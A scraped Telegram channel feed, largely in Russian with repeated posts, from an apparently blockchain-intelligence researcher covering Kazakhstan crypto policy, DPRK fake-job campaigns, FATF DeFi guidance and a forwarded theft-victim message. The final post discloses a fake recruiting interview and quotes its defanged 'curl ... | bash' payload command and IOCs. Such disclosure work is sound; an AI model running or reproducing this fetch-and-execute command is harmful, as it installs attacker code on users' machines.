🚀 Казахстан делает ещё один шаг к легализации крипторынка
Правительство предлагает временно освободить физических лиц от уплаты ИПН с доходов от операций с цифровыми активами. Но есть важное условие - льгота будет действовать только для сделок, совершённых через казахстанских лицензированных провайдеров услуг цифровых активов (Prime Minister of Kazakhstan)
📌 Что известно:
• Льготный период — с 1 января 2026 года по 31 декабря 2028 года.
• Освобождение распространяется только на физических лиц.
• Инициатива пока находится на стадии законопроекта и должна пройти дальнейшее рассмотрение
💬 По сути государство перевести криптооперации из серой зоны в регулируемую инфраструктуру Казахстана. Это должно увеличить ликвидность внутри страны, привлечь пользователей на местные криптоплатформы и сделать рынок более прозрачным (nationalbank.kz)
Если инициативу примут в текущем виде, это станет одним из самых заметных стимулов для развития легального крипторынка в Казахстане
Правительство предлагает временно освободить физических лиц от уплаты ИПН с доходов от операций с цифровыми активами. Но есть важное условие - льгота будет действовать только для сделок, совершённых через казахстанских лицензированных провайдеров услуг цифровых активов (Prime Minister of Kazakhstan)
📌 Что известно:
• Льготный период — с 1 января 2026 года по 31 декабря 2028 года.
• Освобождение распространяется только на физических лиц.
• Инициатива пока находится на стадии законопроекта и должна пройти дальнейшее рассмотрение
💬 По сути государство перевести криптооперации из серой зоны в регулируемую инфраструктуру Казахстана. Это должно увеличить ликвидность внутри страны, привлечь пользователей на местные криптоплатформы и сделать рынок более прозрачным (nationalbank.kz)
Если инициативу примут в текущем виде, это станет одним из самых заметных стимулов для развития легального крипторынка в Казахстане
Национальный Банк Казахстана
О переходе к новому этапу развития отрасли цифровых активов
🔥9❤5👍3
сelestial intelligence lab
Доброе утро 🌞 Увидимся в Москве)
🕵️ At OFFZONE, I’ll be presenting my talk:
People Behind the Interfaces: Tracking Reused Wallet Flows Across Web3 Scam Sites
Web3 scam websites constantly change their domains, names, branding, and visual design. But underneath, they often reuse the same infrastructure and logic: frontend components, wallet connection flows, approval sequences, and transaction-building mechanisms.
In this talk, I’ll show how preserved JavaScript bundles and other frontend artifacts can be analyzed even after a scam website has been blocked or taken offline.
We’ll look at how to:
compare wallet UX and transaction flows across different scam websites;
identify reused frontend components and behavioral patterns;
connect interface-level findings with lightweight on-chain verification;
cluster related campaigns and build detections for threat hunting.
The main idea is simple: scam websites should not be treated as isolated pages. Their interfaces are reusable technical artifacts that can reveal the infrastructure, tools, and potentially the people behind multiple campaigns.
See you at OFFZONE 👾
People Behind the Interfaces: Tracking Reused Wallet Flows Across Web3 Scam Sites
Web3 scam websites constantly change their domains, names, branding, and visual design. But underneath, they often reuse the same infrastructure and logic: frontend components, wallet connection flows, approval sequences, and transaction-building mechanisms.
In this talk, I’ll show how preserved JavaScript bundles and other frontend artifacts can be analyzed even after a scam website has been blocked or taken offline.
We’ll look at how to:
compare wallet UX and transaction flows across different scam websites;
identify reused frontend components and behavioral patterns;
connect interface-level findings with lightweight on-chain verification;
cluster related campaigns and build detections for threat hunting.
The main idea is simple: scam websites should not be treated as isolated pages. Their interfaces are reusable technical artifacts that can reveal the infrastructure, tools, and potentially the people behind multiple campaigns.
See you at OFFZONE 👾
❤12❤🔥4🔥2
Исследователь Vangelis Stykas заявил, что почти два года имел доступ к инфраструктуре северокорейских хакеров и за это время изучил около 5 ТБ внутренних данных
По его словам, в материалах фигурируют 1640 организаций из 57 стран. В 700–800 случаях речь идет о серьёзном проникновении: доступе к AWS, исходному коду, developer keys, root-правам и криптовалютной инфраструктуре 🔐
Большая часть атак связана с кампанией Contagious Interview 🎭. Схема уже знакомая: разработчику предлагают вакансию, отправляют репозиторий или тестовое задание и просят запустить проект локально. Вместе с npm-командами и установочными скриптами запускается вредоносный код💻
Среди компаний, которые упоминались в собранных данных, были Coinbase и Uniswap Labs. Coinbase сообщила, что не обнаружила утечки клиентских данных или другой чувствительной информации
Интересная часть здесь про уровень доступа, который сегодня есть у обычного разработчика или подрядчика. Один заражённый ноутбук может открыть путь сразу к нескольким компаниям, приватным репозиториям, облачной инфраструктуре и кошелькам 🌐
Масштаб пока стоит воспринимать осторожно: значительная часть выводов основана на данных самого исследователя и ещё не получила полной независимой проверки ⚠️. Но сама схема атак давно подтверждена и продолжает работать.
Источник: WIRED, материалы исследования и выступления на Black Hat 🎤.
По его словам, в материалах фигурируют 1640 организаций из 57 стран. В 700–800 случаях речь идет о серьёзном проникновении: доступе к AWS, исходному коду, developer keys, root-правам и криптовалютной инфраструктуре 🔐
Большая часть атак связана с кампанией Contagious Interview 🎭. Схема уже знакомая: разработчику предлагают вакансию, отправляют репозиторий или тестовое задание и просят запустить проект локально. Вместе с npm-командами и установочными скриптами запускается вредоносный код
Среди компаний, которые упоминались в собранных данных, были Coinbase и Uniswap Labs. Coinbase сообщила, что не обнаружила утечки клиентских данных или другой чувствительной информации
Интересная часть здесь про уровень доступа, который сегодня есть у обычного разработчика или подрядчика. Один заражённый ноутбук может открыть путь сразу к нескольким компаниям, приватным репозиториям, облачной инфраструктуре и кошелькам 🌐
Масштаб пока стоит воспринимать осторожно: значительная часть выводов основана на данных самого исследователя и ещё не получила полной независимой проверки ⚠️. Но сама схема атак давно подтверждена и продолжает работать.
Источник: WIRED, материалы исследования и выступления на Black Hat 🎤.
Please open Telegram to view this post
VIEW IN TELEGRAM
WIRED
A Security Pro Hacked North Korean Hackers. He Found They’d Breached Hundreds of Networks Worldwide
For nearly two years, researcher Vangelis Stykas has maintained access to North Korean hackers’ servers. His work shows they pulled off intrusions in a shocking number of systems across the globe.
❤8❤🔥2⚡1
Наткнулся на довольно интересный апдейт от FATF по DeFi. И тут мне больше всего понравилось то, как они предлагают определять, кто стоит за протоколом.
По сути, теперь недостаточно просто назвать себя DAO, decentralized protocol и сказать, что «у нас всё управляется комьюнити». FATF предлагает смотреть на Control or Sufficient Influence (COSI) - есть ли человек, команда или компания, которые в реальности могут существенно влиять на работу протокола. Кто может менять контракты, у кого admin или upgrade keys, кто контролирует treasury, governance, frontend, куда уходят комиссии и кто принимает основные решения.
Тут уже гораздо больше осинта становится)))
Можно взять governance, посмотреть какие кошельки постоянно голосуют вместе, кто их финансирует, как распределена voting power, какие адреса связаны с treasury и privileged roles, а потом уже идти дальше: GitHub, домены, компании, разработчики, публичные аккаунты. То есть буквально из ончейна постепенно восстанавливать не только движение денег, а структуру управления проектом
Причём FATF отдельно говорит важную вещь: если мы не знаем, кто контролирует протокол, это ещё не значит, что его никто не контролирует. Может быть просто пока не проведена нормальная атрибуция. При этом наличие какого-нибудь emergency pause или multisig тоже само по себе не делает проект централизованным - смотреть нужно на всю картину и на то, насколько эти люди действительно могут влиять на финансовую часть протокола.
Короче, мне кажется, это довольно показательный момент для blockchain intelligence. Мы привыкли к классическому tracing: откуда деньги пришли, через что прошли и куда ушли. А тут уже можно ставить совсем другой вопрос: кто голосует, кто управляет, кто получает деньги и кто в итоге стоит за всей этой инфраструктурой.
И чем дальше будет идти регулирование DeFi, тем меньше будет работать аргумент «ну мы же decentralized». В какой-то момент значение будет иметь, что реально можно доказать через on-chain, OSINT и инфраструктуру проекта
По сути, теперь недостаточно просто назвать себя DAO, decentralized protocol и сказать, что «у нас всё управляется комьюнити». FATF предлагает смотреть на Control or Sufficient Influence (COSI) - есть ли человек, команда или компания, которые в реальности могут существенно влиять на работу протокола. Кто может менять контракты, у кого admin или upgrade keys, кто контролирует treasury, governance, frontend, куда уходят комиссии и кто принимает основные решения.
Тут уже гораздо больше осинта становится)))
Можно взять governance, посмотреть какие кошельки постоянно голосуют вместе, кто их финансирует, как распределена voting power, какие адреса связаны с treasury и privileged roles, а потом уже идти дальше: GitHub, домены, компании, разработчики, публичные аккаунты. То есть буквально из ончейна постепенно восстанавливать не только движение денег, а структуру управления проектом
Причём FATF отдельно говорит важную вещь: если мы не знаем, кто контролирует протокол, это ещё не значит, что его никто не контролирует. Может быть просто пока не проведена нормальная атрибуция. При этом наличие какого-нибудь emergency pause или multisig тоже само по себе не делает проект централизованным - смотреть нужно на всю картину и на то, насколько эти люди действительно могут влиять на финансовую часть протокола.
Короче, мне кажется, это довольно показательный момент для blockchain intelligence. Мы привыкли к классическому tracing: откуда деньги пришли, через что прошли и куда ушли. А тут уже можно ставить совсем другой вопрос: кто голосует, кто управляет, кто получает деньги и кто в итоге стоит за всей этой инфраструктурой.
И чем дальше будет идти регулирование DeFi, тем меньше будет работать аргумент «ну мы же decentralized». В какой-то момент значение будет иметь, что реально можно доказать через on-chain, OSINT и инфраструктуру проекта
www.fatf-gafi.org
FATF urges action to respond to emerging risks from Decentralised Finance
In a new report the Financial Action Task Force (FATF) highlights the rapid growth of decentralised finance (DeFi) and how its unique features are being increasingly exploited by illicit actors, including fraudsters, ransomware operators, professional money…
❤9🔥2
Forwarded from Defimon Alerts
💌 Onchain message:
📤 From: 0x5afdd71ec312eda36663f72032f269bd9c950cb4
📥 To: 0x956c33a642435ebf9938ad109032c180cf0cf26c
🌎 Network: mainnet
Etherscan
Hi, Wojciech. After you asked me to install an application called "Meridian," during which I entered my Mac password and created a vault at you request, $584,000 in crypto assets were stolen from four wallets on my computer two hours later.
The stolen funds were transferred to four different wallets, swapped for DAI, and subsequently deposited into or withdrawn from KuCoin and Bybit.
(Address : 0x1675c4ff3be4aff3e60b486304c11d4fe7d58333, 0xD1ec24046e5f12306491d6076F9F4AE1A72C7Fc1)
Police investigators have already issued official cooperation requests to the respective exchanges. During yesterday's investigation, it was confirmed that creating a vault through Meridian allows for password extraction—a step I completed per his instruction during our meeting. All of this information has been fully documented and submitted to the authorities.
Furthermore, I am preparing for an international lawsuit alongside two other victims who experienced similar incidents, working directly with our legal counsel starting today. We are also planning to bring public awareness to this issue through posts across key opinion leader (KOL) networks, reaching a combined total of over 300,000 followers. (Also will share all details regarding our meeting)
However, recognizing that full legal will require a significant amount of time for all parties involved, I am offering a final opportunity to resolve this matter directly:
If you return $350,000 of the stolen $584,000 to the following address: 0x8f78070669a67fcaB7Efb2358386701584Bd7ef0, I will immediately drop all further actions and move past this incident, accepting partial responsibility for my own oversight.
If this amount is not returned, I will proceed immediately with the international lawsuit and all law enforcement steps through our legal team and investigators.
📤 From: 0x5afdd71ec312eda36663f72032f269bd9c950cb4
📥 To: 0x956c33a642435ebf9938ad109032c180cf0cf26c
🌎 Network: mainnet
Etherscan
❤8
Прочитайте и поймите, что не надо качать подозрительные приложения)
Ну и в целом приложения от неизвестных разработчиков
(особенно если вас об этом попросили)
Ну и в целом приложения от неизвестных разработчиков
(особенно если вас об этом попросили)
❤🔥7👍4
🇰🇿 AFSA и Генпрокуратура Казахстана формализовали сотрудничество по расследованиям преступлений с цифровыми активами
Ну всё, ребята, теперь даже по мелкому блечить не получится, вас всех найдут
Ну всё, ребята, теперь даже по мелкому блечить не получится, вас всех найдут
❤🔥8😁2❤1
AFSA почему-то до сих пор не написали с просьбой у них работать…
Начальники, рекрутеры - я жду ваших предложений и рефералок.
Давайте уже наводить криптодвиж и делать KZ лучше, пока я не уехал делать Америку лучше.
Если у вас есть интересные задачи на стыке OSINT / blockchain investigations / CTI - вы знаете, где меня найти)
Начальники, рекрутеры - я жду ваших предложений и рефералок.
Давайте уже наводить криптодвиж и делать KZ лучше, пока я не уехал делать Америку лучше.
Если у вас есть интересные задачи на стыке OSINT / blockchain investigations / CTI - вы знаете, где меня найти)
❤9
Казахстан теперь разрешает иностранцам использовать крипту для участия в Investment Tax Residency Programme через AIFC
С 13 августа можно держать от $150 000 в digital assets через AFSA-licensed платформу и использовать это как qualifying investment. Дальше при выполнении условий - инвесторская виза до 5 лет и налоговое резидентство Казахстана, где достаточно 90 дней присутствия вместо стандартных 183.
То есть условному инвестору не обязательно продавать BTC и перекладываться в локальный актив ради residency - часть капитала можно оставить в крипте
Выглядит как довольно сильный ход со стороны Казахстана)
С 13 августа можно держать от $150 000 в digital assets через AFSA-licensed платформу и использовать это как qualifying investment. Дальше при выполнении условий - инвесторская виза до 5 лет и налоговое резидентство Казахстана, где достаточно 90 дней присутствия вместо стандартных 183.
То есть условному инвестору не обязательно продавать BTC и перекладываться в локальный актив ради residency - часть капитала можно оставить в крипте
Выглядит как довольно сильный ход со стороны Казахстана)
AIFC
AIFC Investment Tax Residency – Visa and Tax Benefits
Invest from $60,000 and Obtain Tax Residency, a Long-Term Visa, Tax Exemptions, and the Right to Live in Kazakhstan
❤12
Forwarded from Говорит Росавиация
— ВНУКОВО
— ШЕРЕМЕТЬЕВО
Please open Telegram to view this post
VIEW IN TELEGRAM
Это было одно из моих первых выступлений именно с собственным исследованием, и, если честно, выступать с ним на OFFZONE было дико страшно. Всё-таки такая площадка, конференция и довольно непростая тема.
Многое пришлось сильно урезать: что-то из-за небольшого временного слота, а что-то - из соображений безопасности. В какой-то момент меня ещё и довольно сильно накрыла паничка, было жарковато во всех смыслах :) Но я закончил доклад и дошёл до конца.
Отдельное спасибо OSINT Mindset - людям, которые для меня уже давно не просто комьюнити, а очень близкие друзья. И спасибо моим близким, которые остались в Казахстане и поддерживали меня на расстоянии.
Огромное спасибо организаторам Community Zone за возможность выступить и за весь этот движ. И отдельно ENZO - за поддержку и за то, сколько сил она вложила во всё это.
В такие моменты особенно понимаешь, насколько важно, какие люди находятся рядом. Я правда очень ценю вас и счастлив быть рядом с вами.
Ну и для тех, кто всё-таки ждёт продолжение исследования в виде полноценной статьи - надеюсь, дождётесь конца сентября. Там уже получится нормально развернуть всю историю, показать то, что не вошло в доклад, и добавить намного больше технических деталей.
Будет очень круто и интересно.
Многое пришлось сильно урезать: что-то из-за небольшого временного слота, а что-то - из соображений безопасности. В какой-то момент меня ещё и довольно сильно накрыла паничка, было жарковато во всех смыслах :) Но я закончил доклад и дошёл до конца.
Отдельное спасибо OSINT Mindset - людям, которые для меня уже давно не просто комьюнити, а очень близкие друзья. И спасибо моим близким, которые остались в Казахстане и поддерживали меня на расстоянии.
Огромное спасибо организаторам Community Zone за возможность выступить и за весь этот движ. И отдельно ENZO - за поддержку и за то, сколько сил она вложила во всё это.
В такие моменты особенно понимаешь, насколько важно, какие люди находятся рядом. Я правда очень ценю вас и счастлив быть рядом с вами.
Ну и для тех, кто всё-таки ждёт продолжение исследования в виде полноценной статьи - надеюсь, дождётесь конца сентября. Там уже получится нормально развернуть всю историю, показать то, что не вошло в доклад, и добавить намного больше технических деталей.
Будет очень круто и интересно.
❤🔥18❤7👍3🔥2
сelestial intelligence lab
Это было одно из моих первых выступлений именно с собственным исследованием, и, если честно, выступать с ним на OFFZONE было дико страшно. Всё-таки такая площадка, конференция и довольно непростая тема. Многое пришлось сильно урезать: что-то из-за небольшого…
Кстати, забавный момент после выступления. Подходили ребята, которые до этого видели меня на Standoff Talks, и сразу заметили, что в этот раз всё было немного иначе 😄
Пару человек такие: «Мы тебя на Standoff Talks видели, ты там вообще по-другому выступал».
Я рассказал, что в этот раз сильно перенервничал уже непосредственно на сцене, плюс тема была намного тяжелее для подачи и многое пришлось ужать в короткий слот.
И у них сразу такое: «Ааа, ну тогда понятно»
На самом деле было даже приятно, что люди, которые видели прошлое выступление, сами заметили разницу. Значит, есть с чем сравнивать и куда дальше расти
Пару человек такие: «Мы тебя на Standoff Talks видели, ты там вообще по-другому выступал».
Я рассказал, что в этот раз сильно перенервничал уже непосредственно на сцене, плюс тема была намного тяжелее для подачи и многое пришлось ужать в короткий слот.
И у них сразу такое: «Ааа, ну тогда понятно»
На самом деле было даже приятно, что люди, которые видели прошлое выступление, сами заметили разницу. Значит, есть с чем сравнивать и куда дальше расти
❤🔥11
сelestial intelligence lab
Это было одно из моих первых выступлений именно с собственным исследованием, и, если честно, выступать с ним на OFFZONE было дико страшно. Всё-таки такая площадка, конференция и довольно непростая тема. Многое пришлось сильно урезать: что-то из-за небольшого…
И ещё момент, который мне немного тяжело отпустить))))
Мне правда неловко перед ENZO и перед теми, кто впервые пришёл послушать именно меня. Потому что я знаю, что могу выступать гораздо лучше, чем получилось в этот раз.
Все вокруг говорят, что всё было нормально и, возможно, я действительно слишком критично к себе отношусь. Но всё равно очень надеюсь, что у тех, кто увидел меня впервые, не осталось впечатления, будто я всегда так выступаю😭
В любом случае для себя выводы я сделал. В следующий раз хочу выйти на сцену уже намного спокойнее и показать тот уровень, который сам от себя ожидаю
UPD: но много челов фоткали мои слайды, приятно)
Мне правда неловко перед ENZO и перед теми, кто впервые пришёл послушать именно меня. Потому что я знаю, что могу выступать гораздо лучше, чем получилось в этот раз.
Все вокруг говорят, что всё было нормально и, возможно, я действительно слишком критично к себе отношусь. Но всё равно очень надеюсь, что у тех, кто увидел меня впервые, не осталось впечатления, будто я всегда так выступаю
В любом случае для себя выводы я сделал. В следующий раз хочу выйти на сцену уже намного спокойнее и показать тот уровень, который сам от себя ожидаю
UPD: но много челов фоткали мои слайды, приятно)
Please open Telegram to view this post
VIEW IN TELEGRAM
❤🔥14👏2
Forwarded from Soxoj insides (Soxoj)
Bookmarked a cool command-line OSINT tool from GitHub but never found time to try it?
I built OSINT Tool Deploy Skill for Claude Code which turns a GitHub link into a working tool💪 with deployment and verification that it actually works. Windows is supported!
Installation time decreases from hours to minutes📉 with templates and a knowledge base of common issues and fixes.
Investigate crimes, not Python dependency errors🥸
👉 Try it: https://github.com/soxoj/claude-osint-deploy
I built OSINT Tool Deploy Skill for Claude Code which turns a GitHub link into a working tool
Installation time decreases from hours to minutes
Investigate crimes, not Python dependency errors
👉 Try it: https://github.com/soxoj/claude-osint-deploy
Please open Telegram to view this post
VIEW IN TELEGRAM
❤6
Forwarded from Cyber Detective
Digital Asset Inventory by @pandora_intelligence
Local-first scanner for discovering accounts and digital assets from data you already have:
- bookmarks
- password-manager exports
- browser history
- local email archives
- saved Google/Apple connected-app pages.
https://github.com/Panda-Lewandowski/digital_asset_inventory
Local-first scanner for discovering accounts and digital assets from data you already have:
- bookmarks
- password-manager exports
- browser history
- local email archives
- saved Google/Apple connected-app pages.
https://github.com/Panda-Lewandowski/digital_asset_inventory
❤9
Как вакансия Blockchain Analyst закончилась curl | bash
Несколько дней назад я откликнулся на вакансию Blockchain Analyst в WhatIf через LinkedIn. На первый взгляд всё выглядело нормально: полноценное описание роли, Web3/blockchain research, on-chain analytics, remote US, зарплата $85k–125k в год. Сама вакансия действительно была опубликована от страницы WhatIf в LinkedIn. LinkedIn
У компании тоже есть нормальный публичный след: страница существует не первый день, WhatIf указывает 2019 год основания, Dubai, размер 2–10 сотрудников и blockchain среди направлений работы.
Вакансия Blockchain Analyst
LinkedIn WhatIf
После отклика мне написал человек под именем Emma Martin с адреса, отображавшегося как emma.martin@whatif.capital.
Первое письмо вообще без красных флагов: когда готов выйти, могу ли работать remote, сколько хочу денег, сколько лет опыта и что из моего опыта наиболее релевантно позиции.
После этого назначили интервью через RelayArc.
RelayArc
Первый странный момент - с телефона на встречу зайти нельзя вообще. Страница прямо говорит: Desktop required.
Ладно. Открываю ссылку с Mac, попадаю в вполне прилично сделанный интерфейс видеозвонка. На другой стороне - Emma Martin.
Только довольно быстро становится понятно, что никакого нормального разговора там нет.
Видео выглядит записанным, а через несколько минут в чате начинается сценарий:
“Can you see and hear me okay?”
Потом:
“I still cannot hear you…”
И наконец предложение воспользоваться встроенным microphone troubleshooting.
Начинается непосредственно delivery.
RelayArc сообщает, что браузер якобы не смог определить микрофон и для полноценного аудио необходимо установить RelayArc for Mac.
Кнопка большая, всё выглядит как обычный troubleshooting какого-нибудь Zoom.
Нажимаем Download App - и внезапно вместо .dmg, App Store или хотя бы подписанного installer получаем инструкцию:
открыть Terminal и выполнить одну команду.
На странице была команда вида:
curl -kfsSL hxxps://download-storage[.]com/... | bash
То есть сервис предлагает скачать содержимое с другого домена и сразу передать его на выполнение в bash.
На этом «интервью» можно было заканчивать.
Получилась довольно аккуратная цепочка:
LinkedIn vacancy → recruiter → screening → scheduled interview → fake video call → искусственная проблема с микрофоном → “desktop app” → curl | bash
Месяц назад другой человек описывал очень похожую Web3 recruitment-схему: вакансия через LinkedIn, затем интервью на неизвестной meeting-платформе Werknova, а recruiter представлялся тем же именем - Emma Martin. Он тоже заметил, что взаимодействие выглядело заранее записанным.
Я пока не утверждаю, что сама WhatIf стоит за этой кампанией. Здесь ещё надо разбираться отдельно: действительно ли письмо было аутентифицировано инфраструктурой whatif.capital, был ли скомпрометирован корпоративный аккаунт/домен или использовалась другая схема.
Но сам infection flow уже достаточно очевиден.
IOC / артефакты на текущий момент:
relayarc[.]io
Persona: Emma Martin
Lure: Blockchain Analyst / Web3 recruitment
Execution: remote shell script via curl ... | bash
Но теперь уже интересно посмотреть, что именно они пытались поставить, куда ходит скрипт, что он собирает и пересекается ли инфраструктура RelayArc с другими fake-interview кампаниями
Так что продолжение, скорее всего, будет)
Несколько дней назад я откликнулся на вакансию Blockchain Analyst в WhatIf через LinkedIn. На первый взгляд всё выглядело нормально: полноценное описание роли, Web3/blockchain research, on-chain analytics, remote US, зарплата $85k–125k в год. Сама вакансия действительно была опубликована от страницы WhatIf в LinkedIn. LinkedIn
У компании тоже есть нормальный публичный след: страница существует не первый день, WhatIf указывает 2019 год основания, Dubai, размер 2–10 сотрудников и blockchain среди направлений работы.
Вакансия Blockchain Analyst
LinkedIn WhatIf
После отклика мне написал человек под именем Emma Martin с адреса, отображавшегося как emma.martin@whatif.capital.
Первое письмо вообще без красных флагов: когда готов выйти, могу ли работать remote, сколько хочу денег, сколько лет опыта и что из моего опыта наиболее релевантно позиции.
После этого назначили интервью через RelayArc.
RelayArc
Первый странный момент - с телефона на встречу зайти нельзя вообще. Страница прямо говорит: Desktop required.
Ладно. Открываю ссылку с Mac, попадаю в вполне прилично сделанный интерфейс видеозвонка. На другой стороне - Emma Martin.
Только довольно быстро становится понятно, что никакого нормального разговора там нет.
Видео выглядит записанным, а через несколько минут в чате начинается сценарий:
“Can you see and hear me okay?”
Потом:
“I still cannot hear you…”
И наконец предложение воспользоваться встроенным microphone troubleshooting.
Начинается непосредственно delivery.
RelayArc сообщает, что браузер якобы не смог определить микрофон и для полноценного аудио необходимо установить RelayArc for Mac.
Кнопка большая, всё выглядит как обычный troubleshooting какого-нибудь Zoom.
Нажимаем Download App - и внезапно вместо .dmg, App Store или хотя бы подписанного installer получаем инструкцию:
открыть Terminal и выполнить одну команду.
На странице была команда вида:
curl -kfsSL hxxps://download-storage[.]com/... | bash
То есть сервис предлагает скачать содержимое с другого домена и сразу передать его на выполнение в bash.
На этом «интервью» можно было заканчивать.
Получилась довольно аккуратная цепочка:
LinkedIn vacancy → recruiter → screening → scheduled interview → fake video call → искусственная проблема с микрофоном → “desktop app” → curl | bash
Месяц назад другой человек описывал очень похожую Web3 recruitment-схему: вакансия через LinkedIn, затем интервью на неизвестной meeting-платформе Werknova, а recruiter представлялся тем же именем - Emma Martin. Он тоже заметил, что взаимодействие выглядело заранее записанным.
Я пока не утверждаю, что сама WhatIf стоит за этой кампанией. Здесь ещё надо разбираться отдельно: действительно ли письмо было аутентифицировано инфраструктурой whatif.capital, был ли скомпрометирован корпоративный аккаунт/домен или использовалась другая схема.
Но сам infection flow уже достаточно очевиден.
IOC / артефакты на текущий момент:
relayarc[.]io
Persona: Emma Martin
Lure: Blockchain Analyst / Web3 recruitment
Execution: remote shell script via curl ... | bash
Но теперь уже интересно посмотреть, что именно они пытались поставить, куда ходит скрипт, что он собирает и пересекается ли инфраструктура RelayArc с другими fake-interview кампаниями
Так что продолжение, скорее всего, будет)
Linkedin
Blockchain Analyst at WhatIf — United States | LinkedIn Jobs
Apply for Blockchain Analyst at WhatIf in United States. Full-time Entry level role. See responsibilities, qualifications, and similar jobs on LinkedIn.
🔥17👍3❤2